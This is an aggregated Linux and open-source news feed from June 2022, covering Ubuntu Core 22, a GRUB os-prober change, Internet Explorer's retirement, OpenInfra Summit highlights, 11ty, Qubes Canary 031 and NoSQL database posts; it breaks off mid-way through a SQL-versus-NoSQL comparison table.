The Ubuntu 22.04 LTS real-time kernel, now available in beta, delivers high performance, ultra-low latency and workload predictability for time-sensitive industrial, telco, automotive and robotics use cases. 

The new release includes a fully preemptible kernel to ensure time-bound responses. Canonical  partners with silicon and hardware manufacturers to enable advanced real-time features out of the box on Ubuntu Certified Hardware. 

Application-centric

Ubuntu Core provides a robust, fully containerised Ubuntu, which breaks down the monolithic Ubuntu image into packages known as snaps – including the kernel, OS and applications. Each snap has an isolated sandbox that includes the application’s dependencies, to make it fully portable and reliable. Canonical’s Snapcraft framework enables on-rails snap development for rapid iteration, automated testing and reliable deployment.

Every device running Ubuntu Core has a dedicated IoT App Store, which offers full control over the apps on their device, and can create, publish and distribute software on one platform. The IoT App Store offers enterprises a sophisticated software management solution, enabling a range of new on-premise features.

The system guarantees transactional mission-critical over-the-air (OTA) updates of the kernel, OS and applications – updates will always complete successfully, or roll back automatically to the previous working version, so a device cannot be “bricked ” by an incomplete update. Snaps also  provide delta updates to minimise network traffic, and digital signatures to ensure software integrity and provenance.

Secure and low touch

Ubuntu Core also provides advanced security features out of the box, including secure boot, full disk encryption, secure recovery and strict confinement of the OS and applications. 

“KMC Controls’ range of IoT devices are purpose-built for mission-critical industrial environments. Security is paramount for our customers. We chose Ubuntu Core for its built-in advanced security features and robust over-the-air update framework. Ubuntu Core comes with 10 years of security update commitment which allows us to keep devices secure in the field for their long life.  With a proven application enablement framework, our development teams can focus on creating applications that solve business problems”, said Brad Kehler, COO at KMC Controls.

Customers benefit from Canonical’s 10 years security maintenance of kernel, OS and application-level code, enabling devices and their applications to meet enterprise and public sector requirements for digital safety.

Thriving partner ecosystem

Partnerships with leading silicon and hardware partners, including Advantech, Lenovo and many others, have established Ubuntu Core’s presence in the market.

The Ubuntu Certified Hardware program defines a range of off the shelf IoT and edge devices trusted to work with Ubuntu. The program uniquely includes  a commitment to continuous testing of certified  hardware at Canonical’s labs with every security update over the full lifecycle of the device. 

“Advantech provides embedded, industrial, IoT and automation solutions. We continue to strengthen our participation in the Ubuntu Certified Hardware Program. Canonical ensures that certified hardware goes through an extensive testing process and provides a stable, secure, and optimised Ubuntu Core to reduce time to market and development costs for our customers.” said Eric Kao, Director of Advantech WISE-Edge+.

Learn more about Ubuntu Core 22

More information on Ubuntu Core 22 can be found at ubuntu.com/core. Canonical will also be publishing a series of blog posts providing deeper dives into the features of Core 22. 

To start working with Ubuntu Core 22 now, download the images for some of the most popular platforms or browse all the supported images.

About Canonical

Canonical is the publisher of Ubuntu, the OS for most public cloud workloads as well as the emerging categories of smart gateways, self-driving cars and advanced robots. Canonical provides enterprise security, support and services to commercial users of Ubuntu. Established in 2004, Canonical is a privately held company.

Media Contacts

Daniel Griffiths,
Director of Communications
pr@canonical.com

Aldo Martinez,
Marketing Executive
pr@canonical.com

15 June, 2022 12:03PM

hackergotchi for SparkyLinux

SparkyLinux

GRUB 2.06

Today’s update on Sparky testing (7) of GRUB bootloader provides a notable change – it does not list other operating systems on the GRUB menu any more:

grub2 (2.06-1) unstable; urgency=medium
* Boot menu entries for other operating systems are no longer generated by
default. To re-enable this, set GRUB_DISABLE_OS_PROBER=false in
/etc/default/grub.

If you have other operating systems installed on your machine edit the grub config file:
sudo nano /etc/default/grub

and add the line on the end of the file:
GRUB_DISABLE_OS_PROBER=false

then regenerate the GRUB menu list:
sudo update-grub

 

15 June, 2022 11:01AM by pavroo

hackergotchi for Ubuntu developers

Ubuntu developers

Oli Warner: Goodbye Internet Explorer

But what will people download Chrome with now?

Raise a glass, kiss your wife, hug your children. It’s finally gone.

IE11 Logo

It’s dead.

Internet Explorer has been dying for an age. 15 years ago IE6 finally bit it, 8 years ago I was calling for webdevs to hasten the death of IE8 and today is the day that Microsoft has finally pulled regular support for “retired” Internet Explorer 11, last of its name.

Its successor, Edge, uses Chrome’s renderer. While I’m sure we’ll have a long chat about the problems of monocultures one day, this means —for now— we can really focus on modern standards without having to worry about what this 9 year old renderer thinks. And I mean that at a commercial, enterprise level. Use display: grid without fallback code. Use ES6 features without Babel transpiling everything. Go, create something and expect it to just work.

Here’s to never having to download the multi-gigabyte, 90 day Internet Explorer test machine images. Here’s to kicking out swathes of compat code. Here’s to being able to [fairly] rigourously test a website locally without a third party running a dozen versions of Windows.

The web is more free for this. Rejoice! while it lasts.

15 June, 2022 12:00AM

June 14, 2022

Ubuntu Blog: Composable infrastructure, sustainable computing and more: OIS 2022 highlights

OIS 2022 is over, but the OpenInfra community stays tuned for the next OpenInfra Summit, taking place in Vancouver in 2023! This year’s summit in Berlin offered a lot of insightful keynotes and technical sessions. Speakers discussed the most recent trends in the industry, including composable infrastructure and sustainable computing, and set the pace for the next releases of the OpenInfra-hosted project, including OpenStack. It was a great opportunity to reconnect in person after the pandemic.

If you missed the event, read on to get a summary of the most notable highlights from OIS 2022, Berlin.

OpenStack enters the Slope of Enlightenment

During my keynote on Day 1, I discussed the fact that OpenStack has just entered the Slope of Enlightenment phase of its Hype Cycle.  Most organisations have realised that OpenStack and Kubernetes are in fact complementary technologies rather than competing ones. Canonical happens to be well-positioned, as Ubuntu is a platform that integrates OpenStack, Kubernetes and applications very well.

To prove this, we presented four recent case studies from customers who have adopted an Ubuntu-based infrastructure, including OpenStack and Kubernetes. Their use cases include:

We see that OpenStack continues to be used more often these days.

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh4.googleusercontent.com/higkTMkAJ6o-yBpMxi-wpMLR9lsWZ-3lgoEBNueQMOm6PXD5f7ecyykMC4AQjvxArjWLb6inQVIzgr9o0iZGSkgeIKQ_QB7xD-4JHOGCHTU-QrhKYd0JsnuYIZ_Y-RBvMvvbrruDNs6FETIY_Q" width="720" /> </noscript>

OpenStack public clouds

Whoever passed through the marketplace at the venue couldn’t miss the booths of public cloud providers. It was super exciting to see all of those companies who have successfully built their own local public cloud infrastructure on OpenStack. Many of them are now extending their offering to other parts of the world, effectively competing with hyperscalers – or preparing to compete.

According to Mark Collier’s keynote, there are now 180+ public cloud providers all over the world who use OpenStack as a platform for cloud infrastructure implementation. 

Together, these companies account for 27% of the cloud market. During one of the lightning talks, Canonical talked about seven reasons to become a business like that, especially from the mobile operator perspective.

Learn more about public cloud implementation on Ubuntu >

Composable infrastructure

Composable infrastructure was definitely another main trend that was discussed during the summit. It was covered by Toby Owen from Fungible and covered in more detail throughout the rest of the week. Composable infrastructure assumes that more and more functions are moved away from the traditional x86 processor architecture into SmartNICs and data processing units (DPUs), leaving hypervisors as a pure set of compute resources for cloud workloads. During the OpenStack Yoga development cycle, our team at Canonical delivered open virtual network (OVN) offloading capabilities in OpenStack Neutron, moving network services down to SmartNICs and DPUs.

Read OpenStack Yoga release notes > 

<noscript> <img alt="" height="152" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_250,h_152/https://lh3.googleusercontent.com/z1WqAz7zmTlbLxYZkTCdU8dCX2RHpfDt6v-jTGXS9wYY4RbSI8UXGQ_Hml44ItiYr36k_cAb5Is1V0G1rLNkqCV9WyLEMMk05COF9uHAoXld6i_GIgHLCyDu-5Dx--MxtHOYqrCg7g_-4JCuaw" width="250" /> </noscript>

Sustainable computing

Stuart Grace from BBC delivered an insightful keynote on sustainable computing.  His session, titled “Building Environmental Dashboards for OpenStack at BBC R&D”, showed how combining real-time data from electricity producers with metrics from OpenStack hypervisors helps BBC  monitor and eventually reduce the environmental impact of various workloads. This story fits very well with a global trend around minimising carbon emissions generated by data centres and the overall trend towards sustainable computing.

Watch an OpenInfra Live episode about sustainable computing >

OpenStack Ops Meetup

On a day after the summit, Deutsche Telekom hosted an OpenStack Ops Meetup to discuss various challenges centred around running OpenStack in production. The topics discussed included OpenStack for VMs and containers, Ceph for storage and common issues with OpenStack operations. They also covered upgrades and a variety of tools available out there that help to tame the complexity of OpenStack, etc.

All summit sessions

All summit sessions, including those delivered by Canonical, have been recorded and will be available on demand. Visit the OpenInfra website and the OpenInfra YouTube channel for the latest updates.

<noscript> <img alt="" height="161" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_250,h_161/https://lh5.googleusercontent.com/nuUBMzgJKLhLCsgT9398_xNaj3mc9UCEu6xXZv3VRMrN7nHnNhqIxW20i0ApeDLwPaYfA5f_A3MnP_W7EnWiil4sckTCNj7PfYVOqFudLptZdIHR1VpVyWGPaY4fi84pONfT7F_bxePb0F5rlA" width="250" /> </noscript>

OpenInfra Summit Vancouver 2023

The next OpenInfra Summit will take place in Vancouver, BC, from the 13th to 15 of June 2023. As of today, there is no more information available yet, but details are coming on the OpenInfra website soon. Book those dates in your calendar and let’s see each other in Vancouver again!

Contact Canonical if you have any questions regarding OpenStack, open infrastructure or any other trends discussed at the summit.

14 June, 2022 07:49AM

hackergotchi for Ubuntu

Ubuntu

Ubuntu Weekly Newsletter Issue 739

Welcome to the Ubuntu Weekly Newsletter, Issue 739 for the week of June 5 – 11, 2022. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

14 June, 2022 12:02AM by guiverc

June 12, 2022

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Blog: The Software Operator Design Pattern: May the force be with you – Part 3

The software operator is a design pattern. A design pattern describes the approach to cover the operational tasks of an application’s implementation. The first post in this series introduced the concept of a design pattern in general. The second post covers the software operator design pattern in particular.

In the second part, we also explained that a design pattern usually covers a discussion about consequences, advantages or disadvantages.  After all, a “pattern” refers to an approach that has been applied multiple times. As a consequence, this experience should be written down to help software developers  make informed decisions about which design to apply.

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh4.googleusercontent.com/hxT33BWL69B--AzadtKdcMwg4NvM6hrnTmh1MDGeNrLHO6nhINR7SL3Q0AW-dTkl8pEIipftTVbZpGTteTSHJ3I-cIQ6e6IVavmU0JWsx6Uw0oLRLYvLrxn3VfpmzYFF9ChB2QxLZFrdlO-uoA" width="720" /> </noscript>

Design forces impact the eventual solution design and may be lead to an evaluation of multiple paths until the final solution is reached (photo credit: Marko Blažević)

This third installment in our series will discuss the “so called” design forces which motivate the pattern. A discussion of design forces in general can be found in early books about software patterns. Examples include Design Patterns and elements of reusable software and the POSA series (Pattern Oriented Software Architecture).

What is a design force?

In software development, design forces are characteristics of a use case which eventually impact a solution’s design. A very simple example is the bounded execution time in a use case for sorting data. Some sorting approaches, which would result in overly long runtimes, would be ruled out. It’s obvious that algorithms do not refer to a design; a design is about the structural arrangement of elements and their interaction. But this example shows that forces can refer to non-functional requirements.

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh5.googleusercontent.com/seoZ1KpW9YftV8MvAqBOE0EfzCQMaZyHVaR5w79YPtrMseIqmS5jSKmUK7Br4bX6dA11zRn7MePae-9ejbL0iQ2tFqdU0xHEVUwiDo7CN3ERPFR9R1TxiAHIpxH7ZNlHZqjIG2Od-LIwZZdWDA" width="720" /> </noscript>

An implementation of a design pattern can have many facets – just like a Rubics cube shot by Dev Asangbam

Forces that impact software operator design

The concept of forces in a design pattern refers to characteristics of concrete use cases and how these s favor a particular design. Software operator patterns are usually  applied in distributed systems, remote execution, cloud native deployments, server software, involving scalability and high user load – to name a few. Let’s consider some of these examples in more detail:

  • Remote execution: Decades ago, servers used to have a display with mouse and keyboards attached for people to work on the operational tasks. Today, operating applications is a remote task.
  • Flexible Operations:  Server applications in growing businesses, regardless if they are customer-facing or not, should be able to adapt to changing demands. Applications must scale up but also down to save resources. Changes in the environment lead to changes in the configuration and any solution needs to be easy to adapt. A software operator must support this flexibility and must not add significant restrictions to the operational capabilities of the application.
  • Application Composition: Server applications are usually composed applications. Simple applications, like those being used for productivity on personal computers, do not impose much demand on operations. It’s rather server applications, which are composed of several elements (web servers, proxy servers, caches, data stores, message brokers) which create a particular challenge for operators. Managing multiple application parts at once creates complexity and hassle.

These three points are the main forces for software operator design pattern: distributed and  remote execution, flexible operations and a composed setup. There are more forces of course and if other relevant ones should be mentioned it could be cyber security and reliability – because for the deployment of applications, the work of many depends on the proper operations and thus reliability and secure operations are equally important.

Look out for part 4

Having the forces pointed out, this series will delve into the advantages of the software operator design pattern.

Further reading

Learn more about Juju and the Juju SDK – our implementation of the software operator design pattern: https://juju.is/docs/sdk

12 June, 2022 09:25PM

Oli Warner: Turning my sites up to Eleven-ty

This site is now powered by a static site generator called 11ty. It’s awesome! I’ll try to explain some of my favourite things about it and reasons you might prefer it to stalwarts in the SSG arena.

Volume knob that goes to 11

15 years ago, training up on Django, I built a blog. It’s what webdevs did back then. It was much faster than Wordpress but the editing always fell short and the database design got in the way more than it helped. Dogfooding your software means every problem is yours. I had a glossy coat but the jelly and chunks arrested my writing process.

SSGs are perfect for blogs and brochure websites

Static site generators churn content through templates into a static website that you can just upload to a simple webserver. This is unlike Django or any other dynamic language, where you host a running process and database on an expensive server 24/7 to generate HTML on demand. You’re just serving files, for free.

Most sites don’t need fresh fresh HTML for every request. They don’t change often enough. A blog or a business’ brochure website might get updates anywhere from a couple of times a day to only once or twice a year. With a static site generator, you can make your edits and regenerate the site.

It’s also secure. There’s nothing to hack running on my domain like there might be in a Wordpress install. There’s no database to run injection attacks against. There’s no indication where the source is hosted. For me, Cloudflare assumes much of liability there and if I’m worried

I’ve used a few SSGs professionally: Jekyll, Hugo and Nuxt.

Why pick 11ty over those?

11ty logo

Jekyll is glacial on Cloudflare’s CI/CD environment; about 3 minutes a build. Hugo is Fast but can be a nightmare to work with when things go wrong. Absolutely user-error, but I’ve wasted days at a time banging my head on Hugo. Both Jekyll and Hugo being non-JS options have their own take on asset management. I’m also a Vue developer so Nuxt is great for me, but force-feeding users a bundle of Vue, Nuxt and routers and whatnot, just for a blog? It’s silly. It does have top-shelf asset management though.

11ty was a perfect balance between Hugo and Nuxt. I get all my favourite frontend tools (PostCSS, PurgeCSS on here) with a generator that isn’t trying to force-feed my users a massive script bundle.

More, I get to pick the markup language I write in. I can use Markdown, Liquid, Handlebars, Nunjucks, Moustache, and many, many more. Even plain old HTML, or a mix. I can bundle images with the blog posts (like Hugo leaf bundles). I can paint extra styles on the page if I want to.

I have freedom. I can do anything, on any page.

It’s been 3 weeks, 2 days since my initial commit on this site’s repo and since finishing the conversion I’ve written more posts than I did in the previous decade, and I’ve also converted two Jekyll sites over too. Each took about an afternoon. Perfect URL parity, nothing ostensibly different, just a [much] better toolchain.

What took longest was editing and upgrading 285 blog posts, spanning back to the early Naughties.

Fast Enough™ for developers

Build performance only matters to a point. On this seven year old laptop, 11ty generates this whole blog, 400 pages, in well under two seconds:

Copied 403 files / Wrote 539 files in 1.46 seconds (2.7ms each, v1.0.1)

It’s a second faster on my desktop, and on a real 23 page brochure website, it’s only 0.3s.

11ty is fast but whatever I use only has to be faster than me switching to my browser. Hugo is insanely fast but so what? Anything less than 2 seconds is Fast Enough™. That’s what I mean.

No added bloat for visitors

Many Javascript-based SSGs bundle in client code too. Sometimes this makes sense: You might use Next and Nuxt to build component rich SPAs, but for blogging and brochure stuff, an extraneous 100KB of swarf delivers a poor user experience.

This may explain why I’ve actively sought out non-JS SSGs like Jekyll and Hugo before.

11ty is one of the few JS SSGs that doesn’t force script on your users. If you want “pure” HTML, that’s what you’ll get. If you’re economic with your CSS, images and fonts, it’s easy to juice the performance stats.

100% on Pagespeed

Comes with batteries…

You don’t have to pick between Markdown and Pug, Liquid or Nunjucks. You get them all, and more. Frontmatter can be in YAML, TOML, HAML, JSON even build-time javascript. So what? So what?! You wouldn’t say that if you’d ever wasted a day trying to work out what the hell a Hugo site was doing because of a typo in a template whose syntax was so thick and unwelcoming, kings built castle walls with it.

11ty is simple and flexible.

There’s also a huge pile of community 11ty plugins too.

… But you can use your own

If you don’t get on with something in 11ty, you use something else, or rip it; do your own thing.

The Eureka moment for me was when I got into a fight with the markdown engine. I wanted to extend it to handle some of the custom things I did in my old blog posts, that I’d implemented in Django. Code to generate Youtube embeds, special floats, <aside> sidebars, etc. It would have been a nightmare to upgrade every post.

Using markdown-it and markdown-it-container I completely replaced the Markdown engine with something I could hack on. Here’s a real “explainer” snippet I have and use:

It’s important to stress that neither of those projects are for 11ty. They’re just two of a million projects sitting on npm for anyone to use. 11ty just makes it easy to use any of this stuff on your pages.

Adding template-filters for all the bundled template languages is also made really simple:

eleventyConfig.addFilter("striptags", v => v.replace(/(<([^>]+)>)/gi, ""))

If you’ve ever used opinionated software before —perhaps even your own— you’ll appreciate that 11ty isn’t just getting out of your way, it’s going out of its way to make your life easy.

What’s not so good?

I’m three sites into 11ty now, I’ve seen how I work with it and I’ve bumped into a few things I’m not gushing about:

  • Pagination is good and frustrating in equal measure. Collections seem like a good idea, filtering them into new collections is easy enough, but actually paginating them can be a bit of a mess. To show a tag page, for example, you actually use pagination to filter the collection to that tag. But then you can’t [easily] re-paginate that data, so I just show all posts from that tag rather than 15.

    If I had hundreds of posts in any one tag, this’d be a problem.

  • For all my complaints with Jekyll and Hugo’s wonky asset pipelines, 11ty’s is completely decoupled.

    I use eleventy-plugin-postcss to call PostCSS at roughly the right time (and update on changes) but I could just as easily handle that externally. There’s nothing in 11ty (obvious to me anyway) to ingest that back into the templates.

    • You can’t easily inline classes that only get used on one page.
    • You can’t easily hash the filenames and update the links that call them after generating the post HTML (that’s important with PurgeCSS).
    • Media handling could be tighter. The Image plugin is official, but this should be part of the project IMO, and not rely on this hairy shortcode.

    It’s important to stress that I’m using 11ty in order that I don’t need bundles, but some of these complaints would be assuaged if the system could parse bundle manifests, so I could use external tools rather than just a dumb static assets and have the right filenames pulled in (at the right time).

  • A scoped include like Django’s would solve a couple of problems I’ve hacked around:

    {% include 'template' with variable=value %}

    Saneef points out that this is possible by leveraging the macro functions in Nunjucks. It’s a bit of a mouthful. I’d prefer a first-party solution (which I guess would actually have to come as part of the Nunjucks), but again it’s interesting to see just how flexible this thing is.

  • Named/keyword arguments in shortcodes would also be nice, so I don’t have to provide every option to just use the last, but I guess this would require some thinking to overcome the lack of support for destructured parameters in ES6.

These are small complaints, maybe already with solutions I’ve just not seen yet.

I’ve still managed to transfer three sites to 11ty in a couple of weeks and I wouldn’t have done that if I didn’t think it worked well enough. I’m really happy with 11ty. I’d heartily recommend it to anyone.

12 June, 2022 12:00AM

hackergotchi for Qubes

Qubes

Qubes Canary 031

We have published Qubes Canary 031. The text of this canary is reproduced below.

This canary and its accompanying signatures will always be available in the Qubes security pack (qubes-secpack).

View Qubes Canary 031 in the qubes-secpack:

https://github.com/QubesOS/qubes-secpack/blob/master/canaries/canary-031-2022.txt

Learn how to obtain and authenticate the qubes-secpack and all the signatures it contains:

https://www.qubes-os.org/security/pack/

View all past canaries:

https://www.qubes-os.org/security/canary/


                    ---===[ Qubes Canary 031 ]===---


Statements
-----------

The Qubes security team members who have digitally signed this file [1]
state the following:

1. The date of issue of this canary is June 11, 2022.

2. There have been 80 Qubes security bulletins published so far.

3. The Qubes Master Signing Key fingerprint is:

       427F 11FD 0FAA 4B08 0123  F01C DDFA 1A3E 3687 9494

4. No warrants have ever been served to us with regard to the Qubes OS
   Project (e.g. to hand out the private signing keys or to introduce
   backdoors).

5. We plan to publish the next of these canary statements in the first
   fourteen days of September 2022. Special note should be taken if no new
   canary is published by that time or if the list of statements changes
   without plausible explanation.


Special announcements
----------------------

None.


Disclaimers and notes
----------------------

We would like to remind you that Qubes OS has been designed under the
assumption that all relevant infrastructure is permanently compromised.
This means that we assume NO trust in any of the servers or services
which host or provide any Qubes-related data, in particular, software
updates, source code repositories, and Qubes ISO downloads.

This canary scheme is not infallible. Although signing the declaration
makes it very difficult for a third party to produce arbitrary
declarations, it does not prevent them from using force or other means,
like blackmail or compromising the signers' laptops, to coerce us to
produce false declarations.

The proof of freshness provided below serves to demonstrate that this
canary could not have been created prior to the date stated. It shows
that a series of canaries was not created in advance.

This declaration is merely a best effort and is provided without any
guarantee or warranty. It is not legally binding in any way to anybody.
None of the signers should be ever held legally responsible for any of
the statements made here.


Proof of freshness
-------------------

Sat, 11 Jun 2022 16:02:15 +0000

Source: DER SPIEGEL - International (https://www.spiegel.de/international/index.rss)
The Artillery War in the Donbas: Ukraine Relying Heavily on Heavy Weapons from the West
Ongoing Dependence on Russian Energy: The Natural Gas Continues to Flow
Europe's Top Prosecutor Brings In More Money than She Spends
The Courageous Women of Kabul: Standing Up to the Taliban's Burqa Decree
Kremlin Threats: Europe Has To Learn To Defend Itself, But How?

Source: NYT > World News (https://rss.nytimes.com/services/xml/rss/nyt/World.xml)
‘We Buried Him and Kept Walking’: Children Die as Somalis Flee Hunger
Rumbling Through Modern Jordan, a Railway From the Past
McDonald’s Is Reinvented in Russia as the Economy Stumbles On
Newly United, French Left Hopes to Counter President in Upcoming Vote
Recording India’s Linguistic Riches as Leaders Push Hindi as Nation’s Tongue

Source: BBC News - World (https://feeds.bbci.co.uk/news/world/rss.xml)
Russia hands out passports in occupied Ukraine cities
Putin and Peter the Great: Russian leader likens himself to 18th Century tsar
China warns Taiwan independence would trigger war
Qatar World Cup 2022: German ex-football star says host's treatment of gay people is unacceptable
China: Footage of women attacked in restaurant sparks outrage

Source: Blockchain.info
000000000000000000032e9b82971c2ef2eb1362c65e01f1db5f60fa81fd5eef


Footnotes
----------

[1] This file should be signed in two ways: (1) via detached PGP
signatures by each of the signers, distributed together with this canary
in the qubes-secpack.git repo, and (2) via digital signatures on the
corresponding qubes-secpack.git repo tags. [2]

[2] Don't just trust the contents of this file blindly! Verify the
digital signatures! Instructions for doing so are documented here:
https://www.qubes-os.org/security/pack/

--
The Qubes Security Team
https://www.qubes-os.org/security/

12 June, 2022 12:00AM

June 11, 2022

hackergotchi for SparkyLinux

SparkyLinux

NotepadNext

There is a new application available for Sparkers: NotepadNext

What is NotepadNext?

A cross-platform, reimplementation of Notepad++. Notepad Next is yet another text and source code editor.

Installation (Sparky 6 & 7 amd64):

sudo apt update
sudo apt install notepadnext

License: GNU GPL 3
Web: github.com/dail8859/NotepadNext

 

11 June, 2022 07:32PM by pavroo

June 10, 2022

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Blog: What is NoSQL and what are database operators?

In the previous blog, SQL vs NoSQL Database, we discussed the difference between two major database categories. In a nutshell, the main difference between NoSQL and SQL is that NoSQL adopts a ‘right tool for the job’ approach, whilst SQL adopts a ‘one tool for all the jobs’.

While SQL remains a standard in organisations worldwide, many other database systems have recently emerged. This is mainly due to the rising volume of highly varied data, scalability, changing storage requirements, the need for high processing power, low latency, and evolving requirements in analytics that database applications have to cater to. NoSQL is a class of newer database systems that offer alternatives to traditional RDBMS so it can cater for one or more of these specialised needs.

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh4.googleusercontent.com/k_VhjpQIE1M0JyJMBC3xyLrLnk0pi-9dPr461hvXKLr-ufBZfsSqJgomWArUKPElyDJfxjOa0o6oQqVWyeCa6Cc0-Hu1Q5xg2NBEJ6DqP9n8gWN-jI2B_p-9NAIjQfdtnMS5wotkQZYjgFpiMw" width="720" /> </noscript>

What does NoSQL mean?

NoSQL stands for “not only SQL” rather than “no SQL”. NoSQL databases aim to build flexible schemas and specific data models. Typically, these databases are built for the web or for scenarios where traditional relational databases can have limitations. NoSQL databases can be quicker to develop applications with, can offer more flexibility and scale; and they often offer excellent performance due to their specialised nature.

Why use NoSQL?

NoSQL databases are widely recognised for their ease of development, functionality, and performance at scale. Multiple NoSQL databases have different characteristics and purposes. However, they share fundamental elements:

  • Developer friendliness
  • Can store various data types (structured, unstructured and semi-structured)
  • Can update schemas and fields easily
  • Specialised to solve specific use cases
  • Can scale horizontally in some databases such as MongoDB, OpenSearch, etc.
  • Some NoSQL communities benefit from open systems and concerted commitment to onboarding users. 
  • There are also multiple proprietary NoSQL services that organisations can use. 

NoSQL database examples

There are multiple types of NoSQL databases, such as document databases, key-value stores, wide-column databases, and graph databases.

  • Document databases are primarily built for storing information like documents, including JSON. Examples are MongoDB and Couchbase. ElasticSearch, and OpenSearch.
  • Databases store data in a “key-value” format and optimise it for reading and writing—for example, Redis.
  • Wide-column databases that use the tabular format of relational databases, allowing a wide variance in how data is named and formatted in each row – even on the same table. For instance, Cassandra.
  • Graph databases that use graph structures to define the relationships between stored data points, such as Neo4j.

What are database operators

The databases mentioned in the previous section must be managed and operated in the production environment. This means that database administrators and analysts who run workloads in various infrastructures should be able to automate tasks to take care of repeatable operational work. An operator can be used to manage the database applications.

An operator is an application that contains code that takes over automated tasks to manage a database. Below is the list of features that an operator should enable so databases can be managed and operated appropriately in any environment. 

Operators for database high availability 

The database should be highly available, as this is usually pretty important for the organisation’s continuity. High Availability (HA) is a system characteristic that aims to ensure an agreed level of operational performance, typically uptime, during a standard period.

Operators ensure that the Recovery Point Objective (RPO) and  Recovery Time Objective (RTO) defined are achieved. The strategy should include automatic failover without data loss – with switching traffic from old primary to new primary, automation of a one-member and full-cluster crash recovery, cross-region and/or cross-cluster replication, health and readiness checks, etc.

Security set-up enabled by operators

A database can hold confidential, sensitive, or protected information, making it a prime target for cyberattacks. Therefore, operators should implement basic security requirements such as user authentication and authorisation is essential and should be enabled by default. In addition, semi-automatic updates, network security, encryption in transit and encryption at rest can be implemented.

Operators for deployment

Deployment readiness is also vital for databases in production. An  automated setup for deployment done by Operators helps organisations improve the customer experience and mitigate operational risks. There are multiple considerations here: schema setup, vertical and horizontal scalability, the ability to deploy air gapped, database plugins, customisation and configuration of the database, multiple database version support, multiple storage system support and many more.

Backup  and restore implementation

Here is the list to consider of what operators should do to enable backup and restore

  • Backup to another region
  • Backup compression
  • Backup encryption with external encryption key storing
  • Partial restoration
  • Consistent backup of multi-shard clusters
  • Point-in-Time Recovery – the possibility to make recovery to any transaction

Operators enables monitoring

A production database should be monitored appropriately. This can be implemented by having logs, query analytics, host and database metrics. In addition, appropriate alerting rules and notification channels must be in place. An operator can simplify and automate enabling these monitoring capabilities for databases.

Canonical Charmed NoSQL database operator

Canonical has developed its own database operators, known as charms. Charms are application packages with all the operational knowledge required to install, maintain and upgrade an application. Charms can integrate with other applications and charms. 

Charmhub.io has published multiple database charms that can run in Kubernetes, Virtual Machines (VMs), public, private and hybrid clouds. Explore the available NoSQL open source charms below:

Deploy Redis using Charmhub – The Open Operator Collection

Deploy Cassandra using Charmhub – The Open Operator Collection

Deploy MongoDB using Charmhub – The Open Operator Collectio

Conclusion

Building and running massively interactive applications has created new technology requirements. This includes requirements on agility, real-time data management, and data variability. Unfortunately, SQL cannot meet these new requirements. Enterprises need to turn to NoSQL database technology.

NoSQL technologies have various data types: document, wide column, graph, and a key-value store. This makes this database more suitable to address multiple use cases.

These databases need to be managed and operated in the production environment, and an operator is an excellent tool to automate tasks for analysts, administrators and engineers.

10 June, 2022 06:38PM

Ubuntu Blog: SQL vs NoSQL: Choosing your database

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh6.googleusercontent.com/hv65XNQDlPqjpZvlLg4MPpaNJK_ilDaV8Akf8sMjD9qIufUkPRmcU6czVHFjLfkwUkaUqDIru9AMiQy37TburZA3Zm4mNaNCFGKT7DrLKpPi-KRTzVGNvhLS3j5RK-JW0uKYAyWaAq8g1dV2bg" width="720" /> </noscript>

IT leaders, engineers, and developers must consider multiple factors when using a database. There are scores of open source and proprietary databases available, and each offers distinct value to organisations. They can be divided into two primary categories: SQL (relational database) and NoSQL (non-relational database). This article will explore the difference between SQL and NoSQL and which option is best for your use case.

Defining SQL

Many IT decision-makers, developers and analysts are familiar with the Relational  Database Management System (RDBMS) and the structured Query Language (SQL). The SQL database language emerged back in 1970. Its primary focus was to reduce system data duplication by creating data structures and schemas.

While SQL remains a standard in organisations worldwide, we see many other database systems emerging. This is mainly due to the rising volume of unstructured data, changing storage requirements, the need for high processing power, and evolving requirements in analytics that database applications have to cater to. NoSQL is one of these newer database systems.

Defining NoSQL

The main difference between NoSQL and SQL is that NoSQL adopts a ‘right tool for the job’ approach, whilst SQL adopts a ‘one tool for all the jobs’. This is the reason why NoSQL is the popular database category alternative to traditional RDBMS.  

NoSQL was developed in the late 2000s. NoSQL stands for “not only SQL” rather than “no SQL”. This database category aims to build flexible schemas and specific data models. Typically, these databases are built for the web or for scenarios where traditional relational databases can have limitations. NoSQL databases can be quicker to develop applications with, can offer more flexibility and scale; and they often offer excellent performance due to their specialised nature.

SQL vs NoSQL

To make informed decisions about which database type to use, practitioners should know the differences between SQL and NoSQL. The table below describes their differences in terms of database structure, storage model, scalability, properties, support, and communities.

CategorySQLNoSQL
Database structureRelational database
Has a predefined schema for structured data
Non-relational database
Has dynamic schemas for unstructured data
Data Storage ModelTable-based with fixed rows and columnsDocument: JSON documents
Key-value: key-value pairs
Wide-column: tables with rows and dynamic columns
Graph: nodes and edges
Search: search engine daemon
Example DatabaseMySQL, PostgreSQLDocument: MongoDB
Key-value: Redis
Wide-column: Cassandra
Graph: Neo4j
Search: OpenSearch
ScalabilityMost SQL databases can be scaled vertically, by increasing the processing power of existing hardware.Some NoSQL databases use a master-slave architecture which scales better horizontally, with additional servers or nodes.
Support and communitiesSQL databases represent massive communities, stable codebases, and proven standards.

SQL languages are mostly proprietary or associated with large, single-vendors.
